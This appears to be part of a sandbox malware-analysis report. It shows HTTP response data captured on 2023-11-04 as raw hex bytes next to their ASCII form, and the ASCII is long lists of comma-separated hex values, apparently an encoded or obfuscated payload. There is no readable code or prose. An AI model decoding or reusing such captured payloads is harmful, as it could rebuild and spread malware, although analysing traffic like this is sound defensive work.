                                                    2023-11-04 00:30:16 UTC320INData Raw: 32 61 2c 63 33 2c 31 31 66 2c 61 33 2c 37 32 2c 37 36 2c 31 32 61 2c 38 39 2c 31 33 37 2c 63 36 2c 34 64 2c 35 32 2c 36 62 2c 38 66 2c 37 37 2c 31 33 37 2c 31 32 31 2c 37 66 2c 34 34 2c 66 66 2c 36 37 2c 31 34 39 2c 31 30 61 2c 62 65 2c 34 33 2c 34 33 2c 62 65 2c 65 65 2c 35 31 2c 36 33 2c 35 35 2c 39 38 2c 31 31 38 2c 64 33 2c 62 35 2c 31 31 39 2c 31 31 62 2c 65 65 2c 66 61 2c 62 32 2c 39 62 2c 31 34 63 2c 34 63 2c 35 32 2c 36 62 2c 64 34 2c 65 35 2c 31 32 38 2c 66 62 2c 62 62 2c 31 32 36 2c 39 33 2c 35 64 2c 31 32 66 2c 64 36 2c 31 34 38 2c 31 30 34 2c 31 32 63 2c 33 37 2c 63 32 2c 31 33 33 2c 38 32 2c 35 35 2c 36 35 2c 64 38 2c 62 66 2c 33 64 2c 38 33 2c 66 33 2c 31 30 64 2c 31 32 66 2c 37 33 2c 64 31 2c 64 31 2c 31 34 30 2c 35 32 2c 65 65 2c 62 39 2c
                                                    Data Ascii: 2a,c3,11f,a3,72,76,12a,89,137,c6,4d,52,6b,8f,77,137,121,7f,44,ff,67,149,10a,be,43,43,be,ee,51,63,55,98,118,d3,b5,119,11b,ee,fa,b2,9b,14c,4c,52,6b,d4,e5,128,fb,bb,126,93,5d,12f,d6,148,104,12c,37,c2,133,82,55,65,d8,bf,3d,83,f3,10d,12f,73,d1,d1,140,52,ee,b9,
                                                    2023-11-04 00:30:16 UTC336INData Raw: 2c 31 33 31 2c 65 64 2c 38 66 2c 31 34 30 2c 31 30 31 2c 37 36 2c 37 37 2c 38 36 2c 31 35 31 2c 62 35 2c 33 38 2c 36 64 2c 31 31 61 2c 63 34 2c 36 61 2c 31 31 63 2c 61 61 2c 31 31 34 2c 34 37 2c 33 38 2c 33 39 2c 37 30 2c 63 36 2c 63 63 2c 65 64 2c 34 65 2c 66 35 2c 61 62 2c 31 34 65 2c 64 66 2c 35 37 2c 63 30 2c 31 36 36 2c 36 39 2c 62 62 2c 62 31 2c 31 32 63 2c 35 63 2c 61 64 2c 38 62 2c 31 37 36 2c 39 30 2c 65 30 2c 62 35 2c 62 65 2c 66 64 2c 36 33 2c 64 34 2c 31 32 35 2c 39 66 2c 38 64 2c 31 33 37 2c 37 65 2c 31 31 38 2c 31 34 32 2c 39 63 2c 66 31 2c 64 31 2c 65 39 2c 31 30 63 2c 35 32 2c 65 61 2c 65 64 2c 64 62 2c 31 32 64 2c 36 34 2c 66 38 2c 34 34 2c 37 34 2c 63 30 2c 66 32 2c 31 34 31 2c 66 35 2c 37 61 2c 62 66 2c 61 66 2c 31 33 39 2c 64 36 2c 31
                                                    Data Ascii: ,131,ed,8f,140,101,76,77,86,151,b5,38,6d,11a,c4,6a,11c,aa,114,47,38,39,70,c6,cc,ed,4e,f5,ab,14e,df,57,c0,166,69,bb,b1,12c,5c,ad,8b,176,90,e0,b5,be,fd,63,d4,125,9f,8d,137,7e,118,142,9c,f1,d1,e9,10c,52,ea,ed,db,12d,64,f8,44,74,c0,f2,141,f5,7a,bf,af,139,d6,1
                                                    2023-11-04 00:30:16 UTC352INData Raw: 31 31 37 2c 39 32 2c 31 33 30 2c 31 31 33 2c 36 39 2c 63 65 2c 37 66 2c 61 34 2c 31 34 36 2c 62 64 2c 62 32 2c 64 61 2c 31 30 39 2c 37 33 2c 34 63 2c 31 35 65 2c 63 33 2c 63 63 2c 65 30 2c 31 35 62 2c 31 32 35 2c 31 31 63 2c 64 39 2c 39 63 2c 36 37 2c 39 36 2c 61 39 2c 39 38 2c 61 38 2c 61 66 2c 39 32 2c 39 36 2c 64 39 2c 61 35 2c 61 65 2c 64 38 2c 61 30 2c 31 35 38 2c 62 37 2c 31 31 64 2c 39 35 2c 37 65 2c 38 34 2c 31 30 65 2c 61 32 2c 66 32 2c 65 62 2c 62 34 2c 31 31 37 2c 38 38 2c 61 64 2c 31 35 32 2c 31 32 64 2c 64 64 2c 37 39 2c 65 39 2c 37 62 2c 38 64 2c 37 66 2c 38 30 2c 62 33 2c 65 64 2c 37 33 2c 65 34 2c 31 31 39 2c 61 62 2c 61 32 2c 35 62 2c 37 38 2c 39 36 2c 66 35 2c 62 35 2c 66 37 2c 37 65 2c 38 34 2c 39 31 2c 37 64 2c 39 33 2c 65 64 2c 64 33
                                                    Data Ascii: 117,92,130,113,69,ce,7f,a4,146,bd,b2,da,109,73,4c,15e,c3,cc,e0,15b,125,11c,d9,9c,67,96,a9,98,a8,af,92,96,d9,a5,ae,d8,a0,158,b7,11d,95,7e,84,10e,a2,f2,eb,b4,117,88,ad,152,12d,dd,79,e9,7b,8d,7f,80,b3,ed,73,e4,119,ab,a2,5b,78,96,f5,b5,f7,7e,84,91,7d,93,ed,d3
                                                    2023-11-04 00:30:16 UTC368INData Raw: 31 32 62 2c 31 30 33 2c 31 31 35 2c 61 63 2c 65 34 2c 31 35 36 2c 39 37 2c 37 35 2c 61 31 2c 31 30 37 2c 64 35 2c 31 30 37 2c 61 37 2c 63 33 2c 31 35 64 2c 37 66 2c 38 66 2c 38 32 2c 31 30 61 2c 64 39 2c 31 31 65 2c 64 34 2c 62 34 2c 31 34 62 2c 35 62 2c 37 38 2c 39 36 2c 31 31 30 2c 66 33 2c 31 34 38 2c 62 36 2c 63 61 2c 31 35 65 2c 38 63 2c 36 32 2c 36 65 2c 31 33 38 2c 66 62 2c 31 34 32 2c 61 62 2c 65 39 2c 31 33 64 2c 35 65 2c 35 63 2c 36 62 2c 31 31 35 2c 31 30 34 2c 31 33 61 2c 63 33 2c 63 39 2c 31 33 64 2c 36 32 2c 36 33 2c 39 61 2c 31 30 37 2c 66 30 2c 31 30 65 2c 61 61 2c 64 63 2c 31 34 35 2c 37 63 2c 39 35 2c 37 65 2c 31 31 65 2c 31 30 38 2c 31 33 37 2c 39 32 2c 62 36 2c 31 36 35 2c 38 34 2c 39 37 2c 37 35 2c 31 33 62 2c 65 34 2c 31 31 39 2c 38
                                                    Data Ascii: 12b,103,115,ac,e4,156,97,75,a1,107,d5,107,a7,c3,15d,7f,8f,82,10a,d9,11e,d4,b4,14b,5b,78,96,110,f3,148,b6,ca,15e,8c,62,6e,138,fb,142,ab,e9,13d,5e,5c,6b,115,104,13a,c3,c9,13d,62,63,9a,107,f0,10e,aa,dc,145,7c,95,7e,11e,108,137,92,b6,165,84,97,75,13b,e4,119,8
                                                    2023-11-04 00:30:16 UTC384INData Raw: 62 62 2c 39 62 2c 36 64 2c 65 33 2c 66 38 2c 38 33 2c 33 34 2c 39 31 2c 35 35 2c 39 32 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 61 63 2c 64 63 2c 38 66 2c 36 63 2c 64 63 2c 31 30 37 2c 61 62 2c 35 34 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 34 34 2c 37 34 2c 35 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 39 34 2c 61 32 2c 62 35 2c 38 33 2c 62 36 2c 64 31 2c 63 34 2c 62 35 2c 39 62 2c 39 61 2c 65 34 2c 61 63 2c 62 65 2c 39 66 2c 34 65 2c 36 63 2c 62 30 2c 63 34 2c 36 62 2c 35 34 2c 62 62 2c 63 63 2c 36 32 2c 33 38 2c 62 32 2c 65 64 2c 62 64 2c 64 31 2c 62 32 2c 64 61 2c 62 31 2c 61 35 2c 61 31 2c 61 62 2c 63 35 2c 64 38 2c 63 34 2c 64 30 2c 63 63 2c 62 62 2c 61 38 2c 61 37 2c 64 64 2c 61 63 2c 63 36 2c 39 36
                                                    Data Ascii: bb,9b,6d,e3,f8,83,34,91,55,92,63,55,65,58,46,38,39,70,43,ac,dc,8f,6c,dc,107,ab,54,5a,67,62,38,44,74,5a,6d,4b,77,43,34,94,a2,b5,83,b6,d1,c4,b5,9b,9a,e4,ac,be,9f,4e,6c,b0,c4,6b,54,bb,cc,62,38,b2,ed,bd,d1,b2,da,b1,a5,a1,ab,c5,d8,c4,d0,cc,bb,a8,a7,dd,ac,c6,96
                                                    2023-11-04 00:30:16 UTC400INData Raw: 2c 34 34 2c 35 30 2c 33 32 2c 34 66 2c 36 64 2c 34 64 2c 35 33 2c 36 63 2c 35 35 2c 35 62 2c 36 38 2c 36 33 2c 33 39 2c 35 34 2c 37 34 2c 36 61 2c 36 64 2c 35 62 2c 37 37 2c 35 33 2c 33 34 2c 34 32 2c 34 31 2c 36 31 2c 36 33 2c 64 37 2c 36 36 2c 64 61 2c 34 37 2c 62 61 2c 33 61 2c 66 32 2c 34 34 2c 64 31 2c 33 32 2c 64 30 2c 36 64 2c 34 65 2c 35 33 2c 36 64 2c 35 35 2c 35 63 2c 36 38 2c 36 34 2c 33 39 2c 34 36 2c 37 35 2c 35 63 2c 36 65 2c 34 64 2c 37 38 2c 34 35 2c 33 35 2c 33 34 2c 34 32 2c 35 33 2c 36 34 2c 35 37 2c 36 36 2c 35 61 2c 34 37 2c 33 61 2c 33 61 2c 37 32 2c 34 34 2c 35 31 2c 33 32 2c 35 30 2c 36 64 2c 34 65 2c 35 33 2c 36 64 2c 35 35 2c 35 63 2c 36 38 2c 36 34 2c 33 39 2c 35 34 2c 37 34 2c 36 61 2c 36 64 2c 35 62 2c 37 37 2c 35 33 2c 33 34
                                                    Data Ascii: ,44,50,32,4f,6d,4d,53,6c,55,5b,68,63,39,54,74,6a,6d,5b,77,53,34,42,41,61,63,d7,66,da,47,ba,3a,f2,44,d1,32,d0,6d,4e,53,6d,55,5c,68,64,39,46,75,5c,6e,4d,78,45,35,34,42,53,64,57,66,5a,47,3a,3a,72,44,51,32,50,6d,4e,53,6d,55,5c,68,64,39,54,74,6a,6d,5b,77,53,34
                                                    2023-11-04 00:30:16 UTC416INData Raw: 36 2c 31 30 63 2c 34 64 2c 62 32 2c 34 33 2c 61 34 2c 38 34 2c 38 66 2c 36 63 2c 35 38 2c 35 65 2c 38 35 2c 36 30 2c 36 31 2c 37 37 2c 39 38 2c 33 63 2c 35 30 2c 37 63 2c 38 37 2c 37 31 2c 34 65 2c 37 62 2c 34 66 2c 34 34 2c 34 32 2c 34 39 2c 36 65 2c 36 62 2c 38 35 2c 36 35 2c 35 38 2c 34 36 2c 38 37 2c 37 63 2c 63 30 2c 34 33 2c 39 30 2c 37 34 2c 39 65 2c 36 63 2c 39 61 2c 63 31 2c 64 64 2c 63 62 2c 62 66 2c 63 65 2c 63 62 2c 39 39 2c 62 32 2c 61 31 2c 61 38 2c 65 36 2c 62 39 2c 65 36 2c 62 35 2c 61 37 2c 39 64 2c 34 31 2c 35 31 2c 36 33 2c 39 63 2c 63 61 2c 63 63 2c 39 36 2c 61 61 2c 61 38 2c 64 33 2c 61 38 2c 63 32 2c 61 34 2c 61 35 2c 64 35 2c 62 61 2c 62 36 2c 64 61 2c 63 62 2c 61 64 2c 64 62 2c 63 33 2c 61 63 2c 61 64 2c 65 33 2c 63 38 2c 36 64 2c
                                                    Data Ascii: 6,10c,4d,b2,43,a4,84,8f,6c,58,5e,85,60,61,77,98,3c,50,7c,87,71,4e,7b,4f,44,42,49,6e,6b,85,65,58,46,87,7c,c0,43,90,74,9e,6c,9a,c1,dd,cb,bf,ce,cb,99,b2,a1,a8,e6,b9,e6,b5,a7,9d,41,51,63,9c,ca,cc,96,aa,a8,d3,a8,c2,a4,a5,d5,ba,b6,da,cb,ad,db,c3,ac,ad,e3,c8,6d,
                                                    2023-11-04 00:30:16 UTC432INData Raw: 65 2c 36 63 2c 31 34 62 2c 31 35 31 2c 31 36 61 2c 31 35 33 2c 35 61 2c 36 37 2c 36 32 2c 33 38 2c 36 63 2c 37 34 2c 35 61 2c 36 64 2c 39 31 2c 66 30 2c 38 33 2c 33 34 2c 33 32 2c 34 31 2c 35 31 2c 36 33 2c 31 33 64 2c 31 31 33 2c 39 66 2c 34 36 2c 33 38 2c 33 39 2c 37 30 2c 34 33 2c 31 34 65 2c 31 33 30 2c 31 34 64 2c 31 36 62 2c 34 63 2c 35 32 2c 36 62 2c 35 34 2c 38 32 2c 36 37 2c 36 32 2c 33 38 2c 35 30 2c 65 64 2c 39 61 2c 36 64 2c 34 62 2c 37 37 2c 34 33 2c 33 34 2c 39 63 2c 62 39 2c 39 31 2c 36 33 2c 35 35 2c 36 35 2c 35 38 2c 34 36 2c 31 32 38 2c 36 39 2c 62 32 2c 34 33 2c 31 34 65 2c 31 33 30 2c 31 34 64 2c 31 36 62 2c 35 34 2c 31 30 33 2c 61 63 2c 35 34 2c 37 63 2c 36 63 2c 66 35 2c 35 31 2c 34 35 2c 37 34 2c 35 61 2c 36 64 2c 31 30 66 2c 61 37
                                                    Data Ascii: e,6c,14b,151,16a,153,5a,67,62,38,6c,74,5a,6d,91,f0,83,34,32,41,51,63,13d,113,9f,46,38,39,70,43,14e,130,14d,16b,4c,52,6b,54,82,67,62,38,50,ed,9a,6d,4b,77,43,34,9c,b9,91,63,55,65,58,46,128,69,b2,43,14e,130,14d,16b,54,103,ac,54,7c,6c,f5,51,45,74,5a,6d,10f,a7
                                                    2023-11-04 00:30:16 UTC448INData Raw: 2c 31 35 64 2c 31 33 64 2c 31 34 33 2c 31 35 63 2c 31 34 35 2c 31 34 62 2c 31 35 38 2c 31 35 33 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 31 34 62 2c 31 35 65 2c 31 33 63 2c 31 36 38 2c 31 33 34 2c 31 32 35 2c 31 32 33 2c 31 33 32 2c 31 34 32 2c 31 35 34 2c 31 34 36 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 37 35 2c 63 66 2c 66 62 2c 31 32 62 2c 61 32 2c 65 31 2c 66 64 2c 63 63 2c 63 31 2c 36 38 2c 64 64 2c 64 30 2c 31 30 63 2c 63 39 2c 61 33 2c 33 38 2c 64 64 2c 31 33 61 2c 35 63 2c 31 33 64 2c 36 30 2c 65 36 2c 61 32 2c 65 32 2c 64 39 2c 36 35 2c 66 33 2c 63 37 2c 37 61 2c 65 63 2c 31 32 30 2c 38 39 2c 31 32 33 2c 31 30 35 2c 39 34 2c 66 63 2c 37 38 2c 34 36 2c 64 61 2c 31 33 62 2c 31 32 30 2c 66 39 2c 39 36 2c 35 63 2c 63 32 2c 66 64 2c 37 65 2c 62 36 2c 37
                                                    Data Ascii: ,15d,13d,143,15c,145,14b,158,153,129,135,165,14b,15e,13c,168,134,125,123,132,142,154,146,156,149,137,75,cf,fb,12b,a2,e1,fd,cc,c1,68,dd,d0,10c,c9,a3,38,dd,13a,5c,13d,60,e6,a2,e2,d9,65,f3,c7,7a,ec,120,89,123,105,94,fc,78,46,da,13b,120,f9,96,5c,c2,fd,7e,b6,7
                                                    2023-11-04 00:30:16 UTC464INData Raw: 35 2c 31 30 65 2c 31 30 38 2c 62 37 2c 31 31 35 2c 31 32 32 2c 31 33 66 2c 31 35 39 2c 31 31 33 2c 65 64 2c 31 35 61 2c 31 34 33 2c 64 30 2c 31 32 64 2c 31 35 33 2c 31 32 39 2c 31 33 31 2c 31 34 38 2c 31 31 34 2c 31 35 61 2c 31 31 64 2c 31 35 65 2c 31 30 39 2c 31 32 34 2c 31 30 36 2c 62 35 2c 31 31 37 2c 31 35 34 2c 31 34 36 2c 31 35 32 2c 31 31 66 2c 65 31 2c 31 32 37 2c 31 32 38 2c 65 36 2c 31 30 39 2c 31 34 30 2c 31 32 32 2c 31 33 62 2c 31 34 30 2c 31 30 36 2c 31 33 66 2c 31 33 64 2c 31 33 61 2c 31 32 30 2c 31 35 37 2c 31 33 35 2c 61 63 2c 31 30 61 2c 31 36 35 2c 31 34 62 2c 31 35 61 2c 31 31 32 2c 31 30 65 2c 31 33 32 2c 31 32 33 2c 61 38 2c 31 30 37 2c 31 34 32 2c 31 35 34 2c 31 34 32 2c 31 33 39 2c 31 31 32 2c 31 33 33 2c 31 30 61 2c 31 31 66 2c 31
                                                    Data Ascii: 5,10e,108,b7,115,122,13f,159,113,ed,15a,143,d0,12d,153,129,131,148,114,15a,11d,15e,109,124,106,b5,117,154,146,152,11f,e1,127,128,e6,109,140,122,13b,140,106,13f,13d,13a,120,157,135,ac,10a,165,14b,15a,112,10e,132,123,a8,107,142,154,142,139,112,133,10a,11f,1
                                                    2023-11-04 00:30:16 UTC480INData Raw: 31 36 35 2c 31 34 31 2c 31 34 37 2c 31 31 32 2c 31 35 32 2c 31 30 61 2c 62 62 2c 31 32 31 2c 31 32 66 2c 64 33 2c 31 32 62 2c 31 34 34 2c 31 35 36 2c 31 33 66 2c 31 30 61 2c 31 31 61 2c 31 32 38 2c 31 35 65 2c 31 33 30 2c 64 31 2c 61 37 2c 31 33 64 2c 31 35 64 2c 31 33 33 2c 64 34 2c 65 32 2c 31 34 33 2c 31 34 62 2c 31 34 65 2c 31 33 63 2c 66 66 2c 31 31 66 2c 31 33 62 2c 64 64 2c 31 35 63 2c 31 33 39 2c 66 39 2c 31 30 62 2c 31 32 33 2c 31 32 33 2c 31 32 38 2c 31 31 35 2c 31 34 34 2c 31 34 34 2c 31 35 33 2c 31 34 35 2c 31 33 34 2c 62 61 2c 61 65 2c 31 35 66 2c 31 33 34 2c 31 33 36 2c 62 33 2c 63 35 2c 31 35 62 2c 31 33 64 2c 31 33 39 2c 31 34 35 2c 31 31 62 2c 31 33 35 2c 31 32 65 2c 62 31 2c 31 32 37 2c 31 33 32 2c 66 36 2c 31 32 32 2c 31 35 63 2c 31 33
                                                    Data Ascii: 165,141,147,112,152,10a,bb,121,12f,d3,12b,144,156,13f,10a,11a,128,15e,130,d1,a7,13d,15d,133,d4,e2,143,14b,14e,13c,ff,11f,13b,dd,15c,139,f9,10b,123,123,128,115,144,144,153,145,134,ba,ae,15f,134,136,b3,c5,15b,13d,139,145,11b,135,12e,b1,127,132,f6,122,15c,13
                                                    2023-11-04 00:30:16 UTC496INData Raw: 30 2c 31 33 64 2c 31 35 61 2c 31 31 35 2c 64 37 2c 31 35 39 2c 31 34 35 2c 31 34 31 2c 31 32 65 2c 31 33 35 2c 31 32 37 2c 31 30 64 2c 66 38 2c 31 34 38 2c 31 35 65 2c 31 33 32 2c 31 33 65 2c 31 31 36 2c 31 32 33 2c 66 62 2c 63 34 2c 31 33 66 2c 31 35 34 2c 31 33 63 2c 31 32 63 2c 31 32 62 2c 31 33 35 2c 31 30 31 2c 62 62 2c 31 35 65 2c 31 33 34 2c 31 33 36 2c 66 38 2c 31 32 31 2c 31 35 62 2c 31 31 35 2c 64 33 2c 31 35 39 2c 31 34 35 2c 31 34 31 2c 31 32 65 2c 31 32 39 2c 31 32 37 2c 31 33 32 2c 31 36 31 2c 31 34 36 2c 31 33 36 2c 63 62 2c 31 36 35 2c 31 33 34 2c 31 31 62 2c 66 39 2c 31 31 30 2c 31 34 30 2c 31 35 31 2c 31 31 65 2c 63 39 2c 31 34 39 2c 31 33 37 2c 31 31 66 2c 31 30 30 2c 31 33 62 2c 31 33 32 2c 31 33 64 2c 31 31 65 2c 31 31 37 2c 64 31 2c
                                                    Data Ascii: 0,13d,15a,115,d7,159,145,141,12e,135,127,10d,f8,148,15e,132,13e,116,123,fb,c4,13f,154,13c,12c,12b,135,101,bb,15e,134,136,f8,121,15b,115,d3,159,145,141,12e,129,127,132,161,146,136,cb,165,134,11b,f9,110,140,151,11e,c9,149,137,11f,100,13b,132,13d,11e,117,d1,
                                                    2023-11-04 00:30:16 UTC512INData Raw: 31 35 61 2c 31 34 32 2c 31 33 37 2c 31 34 31 2c 31 34 66 2c 31 30 31 2c 62 61 2c 31 36 35 2c 31 34 62 2c 31 33 33 2c 31 31 32 2c 31 33 61 2c 31 33 32 2c 31 32 32 2c 31 30 66 2c 31 32 65 2c 31 32 65 2c 31 32 63 2c 63 62 2c 31 35 36 2c 31 34 39 2c 31 30 63 2c 66 66 2c 66 63 2c 31 35 66 2c 31 33 31 2c 31 32 63 2c 31 31 65 2c 31 33 61 2c 31 33 35 2c 63 32 2c 31 34 33 2c 31 35 63 2c 31 31 61 2c 31 32 31 2c 31 32 61 2c 31 35 31 2c 31 32 36 2c 31 33 31 2c 31 34 65 2c 31 33 37 2c 31 33 36 2c 63 31 2c 31 36 38 2c 31 33 34 2c 66 61 2c 66 39 2c 31 30 34 2c 31 34 30 2c 31 35 31 2c 31 34 32 2c 31 33 66 2c 31 34 34 2c 31 30 66 2c 61 65 2c 31 32 61 2c 31 36 31 2c 31 30 39 2c 31 31 36 2c 66 34 2c 31 33 64 2c 31 35 61 2c 31 33 39 2c 31 33 65 2c 31 34 38 2c 31 31 64 2c 64
                                                    Data Ascii: 15a,142,137,141,14f,101,ba,165,14b,133,112,13a,132,122,10f,12e,12e,12c,cb,156,149,10c,ff,fc,15f,131,12c,11e,13a,135,c2,143,15c,11a,121,12a,151,126,131,14e,137,136,c1,168,134,fa,f9,104,140,151,142,13f,144,10f,ae,12a,161,109,116,f4,13d,15a,139,13e,148,11d,d
                                                    2023-11-04 00:30:16 UTC528INData Raw: 2c 31 33 65 2c 62 33 2c 37 64 2c 31 35 38 2c 31 33 64 2c 31 33 39 2c 31 33 32 2c 63 62 2c 31 34 39 2c 31 33 38 2c 38 39 2c 31 32 39 2c 31 33 35 2c 31 36 35 2c 64 63 2c 39 62 2c 31 33 37 2c 31 36 38 2c 31 32 61 2c 31 32 33 2c 31 30 33 2c 38 65 2c 38 61 2c 36 63 2c 61 37 2c 31 32 62 2c 31 34 39 2c 31 30 66 2c 31 32 34 2c 31 32 61 2c 31 36 31 2c 31 30 39 2c 64 31 2c 35 65 2c 31 33 61 2c 31 35 64 2c 31 33 33 2c 31 31 39 2c 65 32 2c 31 34 33 2c 31 32 62 2c 63 32 2c 31 35 32 2c 31 32 39 2c 31 33 35 2c 66 36 2c 38 38 2c 31 35 39 2c 31 33 63 2c 31 35 65 2c 31 33 32 2c 31 30 35 2c 35 33 2c 62 63 2c 61 34 2c 63 63 2c 31 31 62 2c 31 35 36 2c 31 32 31 2c 31 33 32 2c 31 32 39 2c 31 32 61 2c 31 33 36 2c 63 35 2c 37 63 2c 31 31 64 2c 31 33 66 2c 31 35 33 2c 31 31 33 2c
                                                    Data Ascii: ,13e,b3,7d,158,13d,139,132,cb,149,138,89,129,135,165,dc,9b,137,168,12a,123,103,8e,8a,6c,a7,12b,149,10f,124,12a,161,109,d1,5e,13a,15d,133,119,e2,143,12b,c2,152,129,135,f6,88,159,13c,15e,132,105,53,bc,a4,cc,11b,156,121,132,129,12a,136,c5,7c,11d,13f,153,113,
                                                    2023-11-04 00:30:16 UTC544INData Raw: 31 33 34 2c 31 30 32 2c 31 36 36 2c 31 33 31 2c 66 64 2c 36 64 2c 31 33 32 2c 31 34 32 2c 31 32 39 2c 31 34 32 2c 31 32 65 2c 39 32 2c 31 33 37 2c 31 32 39 2c 66 66 2c 31 33 37 2c 66 36 2c 31 33 65 2c 66 35 2c 31 33 64 2c 31 34 36 2c 31 31 33 2c 31 34 31 2c 31 33 34 2c 31 30 65 2c 31 34 62 2c 31 35 38 2c 31 32 38 2c 31 31 33 2c 31 33 37 2c 31 36 34 2c 31 32 31 2c 31 32 30 2c 31 33 61 2c 31 33 62 2c 31 33 32 2c 31 30 65 2c 66 39 2c 31 33 30 2c 64 33 2c 65 38 2c 31 34 34 2c 31 35 36 2c 31 33 66 2c 31 32 30 2c 31 32 62 2c 31 32 36 2c 31 33 37 2c 62 61 2c 31 33 65 2c 66 61 2c 65 37 2c 31 35 64 2c 31 33 64 2c 31 33 39 2c 31 35 61 2c 31 34 32 2c 63 65 2c 64 64 2c 31 34 64 2c 31 32 39 2c 31 32 62 2c 31 36 33 2c 31 32 33 2c 65 32 2c 31 33 36 2c 31 36 38 2c 31 32
                                                    Data Ascii: 134,102,166,131,fd,6d,132,142,129,142,12e,92,137,129,ff,137,f6,13e,f5,13d,146,113,141,134,10e,14b,158,128,113,137,164,121,120,13a,13b,132,10e,f9,130,d3,e8,144,156,13f,120,12b,126,137,ba,13e,fa,e7,15d,13d,139,15a,142,ce,dd,14d,129,12b,163,123,e2,136,168,12
                                                    2023-11-04 00:30:16 UTC560INData Raw: 31 36 38 2c 31 33 34 2c 31 31 66 2c 62 34 2c 31 30 65 2c 31 34 32 2c 31 35 34 2c 31 34 30 2c 31 34 33 2c 31 34 30 2c 31 30 63 2c 31 31 31 2c 31 32 38 2c 65 36 2c 31 32 34 2c 31 34 30 2c 31 32 32 2c 31 33 62 2c 31 35 62 2c 63 32 2c 31 32 66 2c 31 35 63 2c 31 34 35 2c 31 34 37 2c 31 34 37 2c 31 34 65 2c 62 63 2c 31 32 34 2c 31 35 62 2c 64 63 2c 31 33 62 2c 31 33 63 2c 31 36 38 2c 31 32 65 2c 31 31 32 2c 31 31 61 2c 31 33 30 2c 63 37 2c 31 34 33 2c 31 34 36 2c 31 35 36 2c 31 34 35 2c 31 32 36 2c 31 32 30 2c 62 62 2c 31 33 32 2c 31 33 34 2c 31 34 30 2c 31 31 63 2c 31 32 64 2c 31 35 64 2c 31 31 35 2c 31 31 30 2c 31 35 63 2c 31 34 35 2c 31 34 35 2c 31 34 37 2c 31 34 65 2c 31 31 32 2c 63 62 2c 31 30 64 2c 31 33 38 2c 31 35 39 2c 31 30 34 2c 38 63 2c 31 33 33 2c
                                                    Data Ascii: 168,134,11f,b4,10e,142,154,140,143,140,10c,111,128,e6,124,140,122,13b,15b,c2,12f,15c,145,147,147,14e,bc,124,15b,dc,13b,13c,168,12e,112,11a,130,c7,143,146,156,145,126,120,bb,132,134,140,11c,12d,15d,115,110,15c,145,145,147,14e,112,cb,10d,138,159,104,8c,133,
                                                    2023-11-04 00:30:16 UTC576INData Raw: 61 2c 66 62 2c 31 34 61 2c 31 33 32 2c 31 32 61 2c 61 35 2c 66 37 2c 31 35 64 2c 31 33 64 2c 31 33 66 2c 31 35 61 2c 31 32 66 2c 63 65 2c 31 30 66 2c 31 35 33 2c 31 32 39 2c 31 33 31 2c 31 36 33 2c 31 33 34 2c 65 31 2c 66 32 2c 31 36 38 2c 31 33 34 2c 31 32 31 2c 66 38 2c 31 31 64 2c 31 34 30 2c 31 33 65 2c 63 39 2c 31 30 65 2c 31 34 39 2c 31 33 37 2c 31 32 35 2c 31 32 38 2c 31 34 62 2c 62 37 2c 66 37 2c 31 32 32 2c 31 33 66 2c 31 35 39 2c 31 33 62 2c 31 32 64 2c 64 66 2c 66 62 2c 31 34 62 2c 31 35 38 2c 31 34 66 2c 31 32 37 2c 31 30 64 2c 31 30 61 2c 31 34 62 2c 31 35 65 2c 31 33 32 2c 31 33 65 2c 31 33 34 2c 31 32 35 2c 31 31 30 2c 31 30 32 2c 31 33 66 2c 31 35 34 2c 62 39 2c 31 35 36 2c 31 34 39 2c 31 33 37 2c 31 31 38 2c 31 32 61 2c 31 36 31 2c 31 32
                                                    Data Ascii: a,fb,14a,132,12a,a5,f7,15d,13d,13f,15a,12f,ce,10f,153,129,131,163,134,e1,f2,168,134,121,f8,11d,140,13e,c9,10e,149,137,125,128,14b,b7,f7,122,13f,159,13b,12d,df,fb,14b,158,14f,127,10d,10a,14b,15e,132,13e,134,125,110,102,13f,154,b9,156,149,137,118,12a,161,12
                                                    2023-11-04 00:30:16 UTC592INData Raw: 63 65 2c 31 31 65 2c 31 33 37 2c 31 30 31 2c 31 32 37 2c 31 36 31 2c 31 33 34 2c 31 31 35 2c 66 61 2c 31 32 36 2c 31 35 63 2c 31 33 64 2c 31 33 39 2c 31 33 34 2c 61 34 2c 31 34 33 2c 31 35 38 2c 31 34 64 2c 31 30 31 2c 31 32 39 2c 31 36 35 2c 31 34 62 2c 31 33 33 2c 31 32 39 2c 31 35 62 2c 31 32 30 2c 31 31 34 2c 31 31 36 2c 63 33 2c 31 32 32 2c 31 35 33 2c 31 34 36 2c 31 34 63 2c 64 36 2c 31 31 36 2c 31 32 38 2c 31 32 61 2c 31 35 37 2c 31 30 63 2c 38 64 2c 31 31 61 2c 31 33 66 2c 31 35 37 2c 31 31 35 2c 31 33 36 2c 31 35 63 2c 31 34 35 2c 31 32 30 2c 65 39 2c 39 36 2c 31 32 31 2c 31 33 35 2c 31 35 66 2c 31 33 38 2c 31 35 32 2c 31 32 62 2c 31 35 62 2c 63 35 2c 31 30 33 2c 31 32 32 2c 31 33 32 2c 31 33 38 2c 31 34 33 2c 31 33 39 2c 31 33 33 2c 31 34 39 2c
                                                    Data Ascii: ce,11e,137,101,127,161,134,115,fa,126,15c,13d,139,134,a4,143,158,14d,101,129,165,14b,133,129,15b,120,114,116,c3,122,153,146,14c,d6,116,128,12a,157,10c,8d,11a,13f,157,115,136,15c,145,120,e9,96,121,135,15f,138,152,12b,15b,c5,103,122,132,138,143,139,133,149,
